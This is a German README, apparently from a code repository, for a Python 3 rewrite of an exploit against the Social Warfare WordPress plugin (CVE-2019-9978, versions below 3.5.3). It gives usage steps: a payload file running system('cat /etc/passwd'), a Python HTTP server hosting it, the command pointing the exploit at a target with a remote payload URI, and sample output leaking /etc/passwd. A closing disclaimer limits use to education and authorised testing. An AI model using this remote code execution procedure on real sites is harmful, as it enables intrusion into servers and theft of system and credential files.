
Eine Sicherheitslücke zur Entfernten Codeausführung (RCE) im Social Warfare Plugin für WordPress, die Versionen unter 3.5.3 betrifft.
Eine Remote Code Execution (RCE)-Sicherheitslücke im Social Warfare-Plugin für WordPress, die alle Versionen unter 3.5.3 betrifft.
Der ursprüngliche öffentliche Exploit wurde in einer veralteten Python-Version geschrieben und läuft in modernen Umgebungen nicht mehr richtig.
Ich habe den Exploit neu geschrieben, sodass er vollständig mit Python 3 kompatibel ist – einfacher zu verwenden, zu verstehen und in moderne Tools zu integrieren.
Erstelle eine Datei namens payload.txt mit folgendem Inhalt:
<pre>system('cat /etc/passwd')</pre>
Nutze Python, um deine Payload bereitzustellen:
python3 -m http.server 8000
Dadurch wird deine payload.txt unter folgender Adresse erreichbar:
http://<deine-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<ziel-ip>/wordpress \
--payload-uri http://<deine-ip>:8000/payload.txt
Falls das Ziel verwundbar ist, erhältst du eine Ausgabe ähnlich wie:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 Falls diese Payload deinen Tag versüßt hat, würde ein ⭐ mir den Tag versüßen.
< 3.5.3⚠️ Haftungsausschluss: Dieses Repository dient ausschließlich Bildungs‑ und ethischen Testzwecken.
Die unbefugte Nutzung dieses Exploits gegen Systeme, die dir nicht gehören, ist strengstens untersagt.